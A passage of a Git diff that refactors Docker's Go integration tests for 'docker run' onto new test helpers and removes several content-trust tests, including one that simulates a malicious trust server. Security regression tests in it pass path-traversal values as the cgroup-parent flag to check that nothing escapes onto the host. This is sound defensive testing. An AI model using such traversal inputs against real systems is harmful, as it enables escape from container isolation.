mount") - } + // Test reading from a read-only bind mount + out, _ := dockerCmd(c, "run", "-v", fmt.Sprintf("%s:%s/tmp:ro", tmpDir, prefix), "busybox", "ls", prefix+"/tmp") + if !strings.Contains(out, "touch-me") { + c.Fatal("Container failed to read from bind mount") } // test writing to bind mount - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { dockerCmd(c, "run", "-v", fmt.Sprintf(`%s:c:\tmp:rw`, tmpDir), "busybox", "touch", "c:/tmp/holla") } else { dockerCmd(c, "run", "-v", fmt.Sprintf("%s:/tmp:rw", tmpDir), "busybox", "touch", "/tmp/holla") @@ -2012,7 +1916,7 @@ func (s *DockerSuite) TestRunBindMounts(c *check.C) { } // Windows does not (and likely never will) support mounting a single file - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { // test mount a file dockerCmd(c, "run", "-v", fmt.Sprintf("%s/holla:/tmp/holla:rw", tmpDir), "busybox", "sh", "-c", "echo -n 'yotta' > /tmp/holla") content := readFile(path.Join(tmpDir, "holla"), c) // Will fail if the file doesn't exist @@ -2037,9 +1941,9 @@ func (s *DockerSuite) TestRunCidFileCleanupIfEmpty(c *check.C) { tmpCidFile := path.Join(tmpDir, "cid") image := "emptyfs" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Windows can't support an emptyfs image. 
Just use the regular Windows image - image = WindowsBaseImage + image = testEnv.PlatformDefaults.BaseImage } out, _, err := dockerCmdWithError("run", "--cidfile", tmpCidFile, image) if err == nil { @@ -2083,7 +1987,7 @@ func (s *DockerSuite) TestRunCidFileCheckIDLength(c *check.C) { func (s *DockerSuite) TestRunSetMacAddress(c *check.C) { mac := "12:34:56:78:9a:bc" var out string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { out, _ = dockerCmd(c, "run", "-i", "--rm", fmt.Sprintf("--mac-address=%s", mac), "busybox", "sh", "-c", "ipconfig /all | grep 'Physical Address' | awk '{print $12}'") mac = strings.Replace(strings.ToUpper(mac), ":", "-", -1) // To Windows-style MACs } else { @@ -2122,21 +2026,16 @@ func (s *DockerSuite) TestRunDeallocatePortOnMissingIptablesRule(c *check.C) { // TODO Windows. Network settings are not propagated back to inspect. testRequires(c, SameHostDaemon, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") + out := cli.DockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top").Combined() id := strings.TrimSpace(out) ip := inspectField(c, id, "NetworkSettings.Networks.bridge.IPAddress") - iptCmd := exec.Command("iptables", "-D", "DOCKER", "-d", fmt.Sprintf("%s/32", ip), - "!", "-i", "docker0", "-o", "docker0", "-p", "tcp", "-m", "tcp", "--dport", "23", "-j", "ACCEPT") - out, _, err := runCommandWithOutput(iptCmd) - if err != nil { - c.Fatal(err, out) - } - if err := deleteContainer(id); err != nil { - c.Fatal(err) - } + icmd.RunCommand("iptables", "-D", "DOCKER", "-d", fmt.Sprintf("%s/32", ip), + "!", "-i", "docker0", "-o", "docker0", "-p", "tcp", "-m", "tcp", "--dport", "23", "-j", "ACCEPT").Assert(c, icmd.Success) - dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") + cli.DockerCmd(c, "rm", "-fv", id) + + cli.DockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") } func (s *DockerSuite) TestRunPortInUse(c *check.C) { @@ -2180,7 +2079,7 @@ func (s *DockerSuite) 
TestRunAllocatePortInReservedRange(c *check.C) { // Regression test for #7792 func (s *DockerSuite) TestRunMountOrdering(c *check.C) { - // TODO Windows: Post TP5. Updated, but Windows does not support nested mounts currently. + // TODO Windows: Post RS1. Windows does not support nested mounts. testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) prefix, _ := getPrefixAndSlashFromDaemonPlatform() @@ -2276,23 +2175,18 @@ func (s *DockerSuite) TestVolumesNoCopyData(c *check.C) { // are pre-populated such as is built in the dockerfile used in this test. testRequires(c, DaemonIsLinux) prefix, slash := getPrefixAndSlashFromDaemonPlatform() - if _, err := buildImage("dataimage", - `FROM busybox + buildImageSuccessfully(c, "dataimage", build.WithDockerfile(`FROM busybox RUN ["mkdir", "-p", "/foo"] - RUN ["touch", "/foo/bar"]`, - true); err != nil { - c.Fatal(err) - } - + RUN ["touch", "/foo/bar"]`)) dockerCmd(c, "run", "--name", "test", "-v", prefix+slash+"foo", "busybox") if out, _, err := dockerCmdWithError("run", "--volumes-from", "test", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") { c.Fatalf("Data was copied on volumes-from but shouldn't be:\n%q", out) } - tmpDir := randomTmpDirPath("docker_test_bind_mount_copy_data", daemonPlatform) + tmpDir := RandomTmpDirPath("docker_test_bind_mount_copy_data", testEnv.OSType) if out, _, err := dockerCmdWithError("run", "-v", tmpDir+":/foo", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") { - c.Fatalf("Data was copied on bind-mount but shouldn't be:\n%q", out) + c.Fatalf("Data was copied on bind mount but shouldn't be:\n%q", out) } } @@ -2312,13 +2206,8 @@ func (s *DockerSuite) TestRunNoOutputFromPullInStdout(c *check.C) { func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) { testRequires(c, SameHostDaemon) prefix, slash := getPrefixAndSlashFromDaemonPlatform() - if _, err := 
buildImage("run_volumes_clean_paths", - `FROM busybox - VOLUME `+prefix+`/foo/`, - true); err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, "run_volumes_clean_paths", build.WithDockerfile(`FROM busybox + VOLUME `+prefix+`/foo/`)) dockerCmd(c, "run", "-v", prefix+"/foo", "-v", prefix+"/bar/", "--name", "dark_helmet", "run_volumes_clean_paths") out, err := inspectMountSourceField("dark_helmet", prefix+slash+"foo"+slash) @@ -2328,7 +2217,7 @@ func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) { out, err = inspectMountSourceField("dark_helmet", prefix+slash+`foo`) c.Assert(err, check.IsNil) - if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) { + if !strings.Contains(strings.ToLower(out), strings.ToLower(testEnv.PlatformDefaults.VolumesConfigPath)) { c.Fatalf("Volume was not defined for %s/foo\n%q", prefix, out) } @@ -2339,7 +2228,7 @@ func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) { out, err = inspectMountSourceField("dark_helmet", prefix+slash+"bar") c.Assert(err, check.IsNil) - if !strings.Contains(strings.ToLower(out), strings.ToLower(volumesConfigPath)) { + if !strings.Contains(strings.ToLower(out), strings.ToLower(testEnv.PlatformDefaults.VolumesConfigPath)) { c.Fatalf("Volume was not defined for %s/bar\n%q", prefix, out) } } @@ -2349,7 +2238,9 @@ func (s *DockerSuite) TestRunSlowStdoutConsumer(c *check.C) { // TODO Windows: This should be able to run on Windows if can find an // alternate to /dev/zero and /dev/stdout. testRequires(c, DaemonIsLinux) - cont := exec.Command(dockerBinary, "run", "--rm", "busybox", "/bin/sh", "-c", "dd if=/dev/zero of=/dev/stdout bs=1024 count=2000 | catv") + + args := []string{"run", "--rm", "busybox", "/bin/sh", "-c", "dd if=/dev/zero of=/dev/stdout bs=1024 count=2000 | cat -v"} + cont := exec.Command(dockerBinary, args...) 
stdout, err := cont.StdoutPipe() if err != nil { @@ -2359,7 +2250,8 @@ func (s *DockerSuite) TestRunSlowStdoutConsumer(c *check.C) { if err := cont.Start(); err != nil { c.Fatal(err) } - n, err := consumeWithSpeed(stdout, 10000, 5*time.Millisecond, nil) + defer func() { go cont.Wait() }() + n, err := ConsumeWithSpeed(stdout, 10000, 5*time.Millisecond, nil) if err != nil { c.Fatal(err) } @@ -2421,48 +2313,6 @@ func (s *DockerSuite) TestRunModeIpcHost(c *check.C) { } } -func (s *DockerSuite) TestRunModeIpcContainer(c *check.C) { - // Not applicable on Windows as uses Unix-specific capabilities - testRequires(c, SameHostDaemon, DaemonIsLinux) - - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", "echo -n test > /dev/shm/test && touch /dev/mqueue/toto && top") - - id := strings.TrimSpace(out) - state := inspectField(c, id, "State.Running") - if state != "true" { - c.Fatal("Container state is 'not running'") - } - pid1 := inspectField(c, id, "State.Pid") - - parentContainerIpc, err := os.Readlink(fmt.Sprintf("/proc/%s/ns/ipc", pid1)) - if err != nil { - c.Fatal(err) - } - - out, _ = dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "readlink", "/proc/self/ns/ipc") - out = strings.Trim(out, "\n") - if parentContainerIpc != out { - c.Fatalf("IPC different with --ipc=container:%s %s != %s\n", id, parentContainerIpc, out) - } - - catOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "cat", "/dev/shm/test") - if catOutput != "test" { - c.Fatalf("Output of /dev/shm/test expected test but found: %s", catOutput) - } - - // check that /dev/mqueue is actually of mqueue type - grepOutput, _ := dockerCmd(c, "run", fmt.Sprintf("--ipc=container:%s", id), "busybox", "grep", "/dev/mqueue", "/proc/mounts") - if !strings.HasPrefix(grepOutput, "mqueue /dev/mqueue mqueue rw") { - c.Fatalf("Output of 'grep /proc/mounts' expected 'mqueue /dev/mqueue mqueue rw' but found: %s", grepOutput) - } - - lsOutput, _ := dockerCmd(c, "run", 
fmt.Sprintf("--ipc=container:%s", id), "busybox", "ls", "/dev/mqueue") - lsOutput = strings.Trim(lsOutput, "\n") - if lsOutput != "toto" { - c.Fatalf("Output of 'ls /dev/mqueue' expected 'toto' but found: %s", lsOutput) - } -} - func (s *DockerSuite) TestRunModeIpcContainerNotExists(c *check.C) { // Not applicable on Windows as uses Unix-specific capabilities testRequires(c, DaemonIsLinux) @@ -2709,10 +2559,10 @@ func (s *DockerSuite) TestRunNonLocalMacAddress(c *check.C) { args := []string{"run", "--mac-address", addr} expected := addr - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { args = append(args, "busybox", "ifconfig") } else { - args = append(args, WindowsBaseImage, "ipconfig", "/all") + args = append(args, testEnv.PlatformDefaults.BaseImage, "ipconfig", "/all") expected = strings.Replace(strings.ToUpper(addr), ":", "-", -1) } @@ -2805,7 +2655,7 @@ func (s *DockerSuite) TestRunSetDefaultRestartPolicy(c *check.C) { func (s *DockerSuite) TestRunRestartMaxRetries(c *check.C) { out, _ := dockerCmd(c, "run", "-d", "--restart=on-failure:3", "busybox", "false") timeout := 10 * time.Second - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { timeout = 120 * time.Second } @@ -2838,7 +2688,7 @@ func (s *DockerSuite) TestRunContainerWithReadonlyRootfs(c *check.C) { if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { testPriv = false } - testReadOnlyFile(c, testPriv, "/file", "/etc/hosts", "/etc/resolv.conf", "/etc/hostname", "/sys/kernel", "/dev/.dont.touch.me") + testReadOnlyFile(c, testPriv, "/file", "/etc/hosts", "/etc/resolv.conf", "/etc/hostname") } func (s *DockerSuite) TestPermissionsPtsReadonlyRootfs(c *check.C) { @@ -2926,34 +2776,27 @@ func (s *DockerSuite) TestRunVolumesFromRestartAfterRemoved(c *check.C) { // run container with --rm should remove container if exit code != 0 func (s *DockerSuite) TestRunContainerWithRmFlagExitCodeNotEqualToZero(c *check.C) { + existingContainers := ExistingContainerIDs(c) name := 
"flowers" - out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "ls", "/notexists") - if err == nil { - c.Fatal("Expected docker run to fail", out, err) - } - - out, err = getAllContainers() - if err != nil { - c.Fatal(out, err) - } + cli.Docker(cli.Args("run", "--name", name, "--rm", "busybox", "ls", "/notexists")).Assert(c, icmd.Expected{ + ExitCode: 1, + }) + out := cli.DockerCmd(c, "ps", "-q", "-a").Combined() + out = RemoveOutputForExistingElements(out, existingContainers) if out != "" { c.Fatal("Expected not to have containers", out) } } func (s *DockerSuite) TestRunContainerWithRmFlagCannotStartContainer(c *check.C) { + existingContainers := ExistingContainerIDs(c) name := "sparkles" - out, _, err := dockerCmdWithError("run", "--name", name, "--rm", "busybox", "commandNotFound") - if err == nil { - c.Fatal("Expected docker run to fail", out, err) - } - - out, err = getAllContainers() - if err != nil { - c.Fatal(out, err) - } - + cli.Docker(cli.Args("run", "--name", name, "--rm", "busybox", "commandNotFound")).Assert(c, icmd.Expected{ + ExitCode: 127, + }) + out := cli.DockerCmd(c, "ps", "-q", "-a").Combined() + out = RemoveOutputForExistingElements(out, existingContainers) if out != "" { c.Fatal("Expected not to have containers", out) } @@ -3124,12 +2967,16 @@ func (s *DockerSuite) TestRunUnshareProc(c *check.C) { } }() + var retErr error for i := 0; i < 3; i++ { err := <-errChan - if err != nil { - c.Fatal(err) + if retErr == nil && err != nil { + retErr = err } } + if retErr != nil { + c.Fatal(retErr) + } } func (s *DockerSuite) TestRunPublishPort(c *check.C) { @@ -3173,13 +3020,10 @@ func (s *DockerSuite) TestVolumeFromMixedRWOptions(c *check.C) { dockerCmd(c, "run", "--name", "parent", "-v", prefix+"/test", "busybox", "true") - // TODO Windows: Temporary check - remove once TP5 support is dropped - if daemonPlatform != "windows" || windowsDaemonKV >= 14350 { - dockerCmd(c, "run", "--volumes-from", "parent:ro", "--name", 
"test-volumes-1", "busybox", "true") - } + dockerCmd(c, "run", "--volumes-from", "parent:ro", "--name", "test-volumes-1", "busybox", "true") dockerCmd(c, "run", "--volumes-from", "parent:rw", "--name", "test-volumes-2", "busybox", "true") - if daemonPlatform != "windows" { + if testEnv.OSType != "windows" { mRO, err := inspectMountPoint("test-volumes-1", prefix+slash+"test") c.Assert(err, checker.IsNil, check.Commentf("failed to inspect mount point")) if mRO.RW { @@ -3230,6 +3074,11 @@ func (s *DockerSuite) TestRunNetworkFilesBindMount(c *check.C) { filename := createTmpFile(c, expected) defer os.Remove(filename) + // for user namespaced test runs, the temp file must be accessible to unprivileged root + if err := os.Chmod(filename, 0646); err != nil { + c.Fatalf("error modifying permissions of %s: %v", filename, err) + } + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} for i := range nwfiles { @@ -3247,6 +3096,11 @@ func (s *DockerSuite) TestRunNetworkFilesBindMountRO(c *check.C) { filename := createTmpFile(c, "test123") defer os.Remove(filename) + // for user namespaced test runs, the temp file must be accessible to unprivileged root + if err := os.Chmod(filename, 0646); err != nil { + c.Fatalf("error modifying permissions of %s: %v", filename, err) + } + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} for i := range nwfiles { @@ -3264,6 +3118,11 @@ func (s *DockerSuite) TestRunNetworkFilesBindMountROFilesystem(c *check.C) { filename := createTmpFile(c, "test123") defer os.Remove(filename) + // for user namespaced test runs, the temp file must be accessible to unprivileged root + if err := os.Chmod(filename, 0646); err != nil { + c.Fatalf("error modifying permissions of %s: %v", filename, err) + } + nwfiles := []string{"/etc/resolv.conf", "/etc/hosts", "/etc/hostname"} for i := range nwfiles { @@ -3281,171 +3140,6 @@ func (s *DockerSuite) TestRunNetworkFilesBindMountROFilesystem(c *check.C) { } } -func (s 
*DockerTrustSuite) TestTrustedRun(c *check.C) { - // Windows does not support this functionality - testRequires(c, DaemonIsLinux) - repoName := s.setupTrustedImage(c, "trusted-run") - - // Try run - runCmd := exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err := runCommandWithOutput(runCmd) - if err != nil { - c.Fatalf("Error running trusted run: %s\n%s\n", err, out) - } - - if !strings.Contains(string(out), "Tagging") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - dockerCmd(c, "rmi", repoName) - - // Try untrusted run to ensure we pushed the tag to the registry - runCmd = exec.Command(dockerBinary, "run", "--disable-content-trust=true", repoName) - s.trustedCmd(runCmd) - out, _, err = runCommandWithOutput(runCmd) - if err != nil { - c.Fatalf("Error running trusted run: %s\n%s", err, out) - } - - if !strings.Contains(string(out), "Status: Downloaded") { - c.Fatalf("Missing expected output on trusted run with --disable-content-trust:\n%s", out) - } -} - -func (s *DockerTrustSuite) TestUntrustedRun(c *check.C) { - // Windows does not support this functionality - testRequires(c, DaemonIsLinux) - repoName := fmt.Sprintf("%v/dockercliuntrusted/runtest:latest", privateRegistryURL) - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - dockerCmd(c, "push", repoName) - dockerCmd(c, "rmi", repoName) - - // Try trusted run on untrusted tag - runCmd := exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err := runCommandWithOutput(runCmd) - if err == nil { - c.Fatalf("Error expected when running trusted run with:\n%s", out) - } - - if !strings.Contains(string(out), "does not have trust data for") { - c.Fatalf("Missing expected output on trusted run:\n%s", out) - } -} - -func (s *DockerTrustSuite) TestRunWhenCertExpired(c *check.C) { - // Windows does not support this functionality - testRequires(c, DaemonIsLinux) - c.Skip("Currently changes system 
time, causing instability") - repoName := s.setupTrustedImage(c, "trusted-run-expired") - - // Certificates have 10 years of expiration - elevenYearsFromNow := time.Now().Add(time.Hour * 24 * 365 * 11) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try run - runCmd := exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err := runCommandWithOutput(runCmd) - if err == nil { - c.Fatalf("Error running trusted run in the distant future: %s\n%s", err, out) - } - - if !strings.Contains(string(out), "could not validate the path to a trusted root") { - c.Fatalf("Missing expected output on trusted run in the distant future:\n%s", out) - } - }) - - runAtDifferentDate(elevenYearsFromNow, func() { - // Try run - runCmd := exec.Command(dockerBinary, "run", "--disable-content-trust", repoName) - s.trustedCmd(runCmd) - out, _, err := runCommandWithOutput(runCmd) - if err != nil { - c.Fatalf("Error running untrusted run in the distant future: %s\n%s", err, out) - } - - if !strings.Contains(string(out), "Status: Downloaded") { - c.Fatalf("Missing expected output on untrusted run in the distant future:\n%s", out) - } - }) -} - -func (s *DockerTrustSuite) TestTrustedRunFromBadTrustServer(c *check.C) { - // Windows does not support this functionality - testRequires(c, DaemonIsLinux) - repoName := fmt.Sprintf("%v/dockerclievilrun/trusted:latest", privateRegistryURL) - evilLocalConfigDir, err := ioutil.TempDir("", "evilrun-local-config-dir") - if err != nil { - c.Fatalf("Failed to create local temp dir") - } - - // tag the image and upload it to the private registry - dockerCmd(c, "tag", "busybox", repoName) - - pushCmd := exec.Command(dockerBinary, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err := runCommandWithOutput(pushCmd) - if err != nil { - c.Fatalf("Error running trusted push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) 
- } - - dockerCmd(c, "rmi", repoName) - - // Try run - runCmd := exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err = runCommandWithOutput(runCmd) - if err != nil { - c.Fatalf("Error running trusted run: %s\n%s", err, out) - } - - if !strings.Contains(string(out), "Tagging") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - dockerCmd(c, "rmi", repoName) - - // Kill the notary server, start a new "evil" one. - s.not.Close() - s.not, err = newTestNotary(c) - if err != nil { - c.Fatalf("Restarting notary server failed.") - } - - // In order to make an evil server, lets re-init a client (with a different trust dir) and push new data. - // tag an image and upload it to the private registry - dockerCmd(c, "--config", evilLocalConfigDir, "tag", "busybox", repoName) - - // Push up to the new server - pushCmd = exec.Command(dockerBinary, "--config", evilLocalConfigDir, "push", repoName) - s.trustedCmd(pushCmd) - out, _, err = runCommandWithOutput(pushCmd) - if err != nil { - c.Fatalf("Error running trusted push: %s\n%s", err, out) - } - if !strings.Contains(string(out), "Signing and pushing trust metadata") { - c.Fatalf("Missing expected output on trusted push:\n%s", out) - } - - // Now, try running with the original client from this new trust server. This should fail because the new root is invalid. 
- runCmd = exec.Command(dockerBinary, "run", repoName) - s.trustedCmd(runCmd) - out, _, err = runCommandWithOutput(runCmd) - - if err == nil { - c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out) - } - if !strings.Contains(out, "could not rotate trust to a new trusted root") { - c.Fatalf("Missing expected output on trusted run:\n%s", out) - } -} - func (s *DockerSuite) TestPtraceContainerProcsFromHost(c *check.C) { // Not applicable on Windows as uses Unix specific functionality testRequires(c, DaemonIsLinux, SameHostDaemon) @@ -3543,48 +3237,23 @@ func (s *DockerSuite) TestRunContainerWithCgroupParent(c *check.C) { // Not applicable on Windows as uses Unix specific functionality testRequires(c, DaemonIsLinux) - cgroupParent := "test" - name := "cgroup-test" + // cgroup-parent relative path + testRunContainerWithCgroupParent(c, "test", "cgroup-test") - out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") - if err != nil { - c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) - } - cgroupPaths := parseCgroupPaths(string(out)) - if len(cgroupPaths) == 0 { - c.Fatalf("unexpected output - %q", string(out)) - } - id, err := getIDByName(name) - c.Assert(err, check.IsNil) - expectedCgroup := path.Join(cgroupParent, id) - found := false - for _, path := range cgroupPaths { - if strings.HasSuffix(path, expectedCgroup) { - found = true - break - } - } - if !found { - c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. 
Cgroup Paths: %v", expectedCgroup, cgroupPaths) - } + // cgroup-parent absolute path + testRunContainerWithCgroupParent(c, "/cgroup-parent/test", "cgroup-test-absolute") } -func (s *DockerSuite) TestRunContainerWithCgroupParentAbsPath(c *check.C) { - // Not applicable on Windows as uses Unix specific functionality - testRequires(c, DaemonIsLinux) - - cgroupParent := "/cgroup-parent/test" - name := "cgroup-test" +func testRunContainerWithCgroupParent(c *check.C, cgroupParent, name string) { out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") if err != nil { c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) } - cgroupPaths := parseCgroupPaths(string(out)) + cgroupPaths := ParseCgroupPaths(string(out)) if len(cgroupPaths) == 0 { c.Fatalf("unexpected output - %q", string(out)) } - id, err := getIDByName(name) - c.Assert(err, check.IsNil) + id := getIDByName(c, name) expectedCgroup := path.Join(cgroupParent, id) found := false for _, path := range cgroupPaths { @@ -3603,49 +3272,12 @@ func (s *DockerSuite) TestRunInvalidCgroupParent(c *check.C) { // Not applicable on Windows as uses Unix specific functionality testRequires(c, DaemonIsLinux) - cgroupParent := "../../../../../../../../SHOULD_NOT_EXIST" - cleanCgroupParent := "SHOULD_NOT_EXIST" - name := "cgroup-invalid-test" + testRunInvalidCgroupParent(c, "../../../../../../../../SHOULD_NOT_EXIST", "SHOULD_NOT_EXIST", "cgroup-invalid-test") - out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") - if err != nil { - // XXX: This may include a daemon crash. - c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err) - } - - // We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue. 
- if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) { - c.Fatalf("SECURITY: --cgroup-parent with ../../ relative paths cause files to be created in the host (this is bad) !!") - } - - cgroupPaths := parseCgroupPaths(string(out)) - if len(cgroupPaths) == 0 { - c.Fatalf("unexpected output - %q", string(out)) - } - id, err := getIDByName(name) - c.Assert(err, check.IsNil) - expectedCgroup := path.Join(cleanCgroupParent, id) - found := false - for _, path := range cgroupPaths { - if strings.HasSuffix(path, expectedCgroup) { - found = true - break - } - } - if !found { - c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths) - } + testRunInvalidCgroupParent(c, "/../../../../../../../../SHOULD_NOT_EXIST", "/SHOULD_NOT_EXIST", "cgroup-absolute-invalid-test") } -// TestRunInvalidCgroupParent checks that a specially-crafted cgroup parent doesn't cause Docker to crash or start modifying /. -func (s *DockerSuite) TestRunAbsoluteInvalidCgroupParent(c *check.C) { - // Not applicable on Windows as uses Unix specific functionality - testRequires(c, DaemonIsLinux) - - cgroupParent := "/../../../../../../../../SHOULD_NOT_EXIST" - cleanCgroupParent := "/SHOULD_NOT_EXIST" - name := "cgroup-absolute-invalid-test" - +func testRunInvalidCgroupParent(c *check.C, cgroupParent, cleanCgroupParent, name string) { out, _, err := dockerCmdWithError("run", "--cgroup-parent", cgroupParent, "--name", name, "busybox", "cat", "/proc/self/cgroup") if err != nil { // XXX: This may include a daemon crash. @@ -3654,15 +3286,14 @@ func (s *DockerSuite) TestRunAbsoluteInvalidCgroupParent(c *check.C) { // We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue. 
if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) { - c.Fatalf("SECURITY: --cgroup-parent with /../../ garbage paths cause files to be created in the host (this is bad) !!") + c.Fatalf("SECURITY: --cgroup-parent with ../../ relative paths cause files to be created in the host (this is bad) !!") } - cgroupPaths := parseCgroupPaths(string(out)) + cgroupPaths := ParseCgroupPaths(string(out)) if len(cgroupPaths) == 0 { c.Fatalf("unexpected output - %q", string(out)) } - id, err := getIDByName(name) - c.Assert(err, check.IsNil) + id := getIDByName(c, name) expectedCgroup := path.Join(cleanCgroupParent, id) found := false for _, path := range cgroupPaths { @@ -3783,8 +3414,8 @@ func (s *DockerSuite) TestRunLoopbackOnlyExistsWhenNetworkingDisabled(c *check.C // Issue #4681 func (s *DockerSuite) TestRunLoopbackWhenNetworkDisabled(c *check.C) { - if daemonPlatform == "windows" { - dockerCmd(c, "run", "--net=none", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1") + if testEnv.OSType == "windows" { + dockerCmd(c, "run", "--net=none", testEnv.PlatformDefaults.BaseImage, "ping", "-n", "1", "127.0.0.1") } else { dockerCmd(c, "run", "--net=none", "busybox", "ping", "-c", "1", "127.0.0.1") } @@ -4030,23 +3661,19 @@ func (s *DockerSuite) TestRunWrongCpusetMemsFlagValue(c *check.C) { // TestRunNonExecutableCmd checks that 'docker run busybox foo' exits with error code 127' func (s *DockerSuite) TestRunNonExecutableCmd(c *check.C) { name := "testNonExecutableCmd" - runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "foo") - _, exit, _ := runCommandWithOutput(runCmd) - stateExitCode := findContainerExitCode(c, name) - if !(exit == 127 && strings.Contains(stateExitCode, "127")) { - c.Fatalf("Run non-executable command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode) - } + icmd.RunCommand(dockerBinary, "run", "--name", name, "busybox", "foo").Assert(c, icmd.Expected{ + ExitCode: 127, + 
Error: "exit status 127", + }) } // TestRunNonExistingCmd checks that 'docker run busybox /bin/foo' exits with code 127. func (s *DockerSuite) TestRunNonExistingCmd(c *check.C) { name := "testNonExistingCmd" - runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/bin/foo") - _, exit, _ := runCommandWithOutput(runCmd) - stateExitCode := findContainerExitCode(c, name) - if !(exit == 127 && strings.Contains(stateExitCode, "127")) { - c.Fatalf("Run non-existing command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode) - } + icmd.RunCommand(dockerBinary, "run", "--name", name, "busybox", "/bin/foo").Assert(c, icmd.Expected{ + ExitCode: 127, + Error: "exit status 127", + }) } // TestCmdCannotBeInvoked checks that 'docker run busybox /etc' exits with 126, or @@ -4054,34 +3681,32 @@ func (s *DockerSuite) TestRunNonExistingCmd(c *check.C) { // as that's when the check is made (and yes, by its design...) func (s *DockerSuite) TestCmdCannotBeInvoked(c *check.C) { expected := 126 - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = 127 } name := "testCmdCannotBeInvoked" - runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/etc") - _, exit, _ := runCommandWithOutput(runCmd) - stateExitCode := findContainerExitCode(c, name) - if !(exit == expected && strings.Contains(stateExitCode, strconv.Itoa(expected))) { - c.Fatalf("Run cmd that cannot be invoked should have errored with code %d, but we got exit: %d, State.ExitCode: %s", expected, exit, stateExitCode) - } + icmd.RunCommand(dockerBinary, "run", "--name", name, "busybox", "/etc").Assert(c, icmd.Expected{ + ExitCode: expected, + Error: fmt.Sprintf("exit status %d", expected), + }) } // TestRunNonExistingImage checks that 'docker run foo' exits with error msg 125 and contains 'Unable to find image' +// FIXME(vdemeester) should be a unit test func (s *DockerSuite) TestRunNonExistingImage(c *check.C) { - runCmd 
:= exec.Command(dockerBinary, "run", "foo") - out, exit, err := runCommandWithOutput(runCmd) - if !(err != nil && exit == 125 && strings.Contains(out, "Unable to find image")) { - c.Fatalf("Run non-existing image should have errored with 'Unable to find image' code 125, but we got out: %s, exit: %d, err: %s", out, exit, err) - } + icmd.RunCommand(dockerBinary, "run", "foo").Assert(c, icmd.Expected{ + ExitCode: 125, + Err: "Unable to find image", + }) } // TestDockerFails checks that 'docker run -foo busybox' exits with 125 to signal docker run failed +// FIXME(vdemeester) should be a unit test func (s *DockerSuite) TestDockerFails(c *check.C) { - runCmd := exec.Command(dockerBinary, "run", "-foo", "busybox") - out, exit, err := runCommandWithOutput(runCmd) - if !(err != nil && exit == 125) { - c.Fatalf("Docker run with flag not defined should exit with 125, but we got out: %s, exit: %d, err: %s", out, exit, err) - } + icmd.RunCommand(dockerBinary, "run", "-foo", "busybox").Assert(c, icmd.Expected{ + ExitCode: 125, + Error: "exit status 125", + }) } // TestRunInvalidReference invokes docker run with a bad reference. 
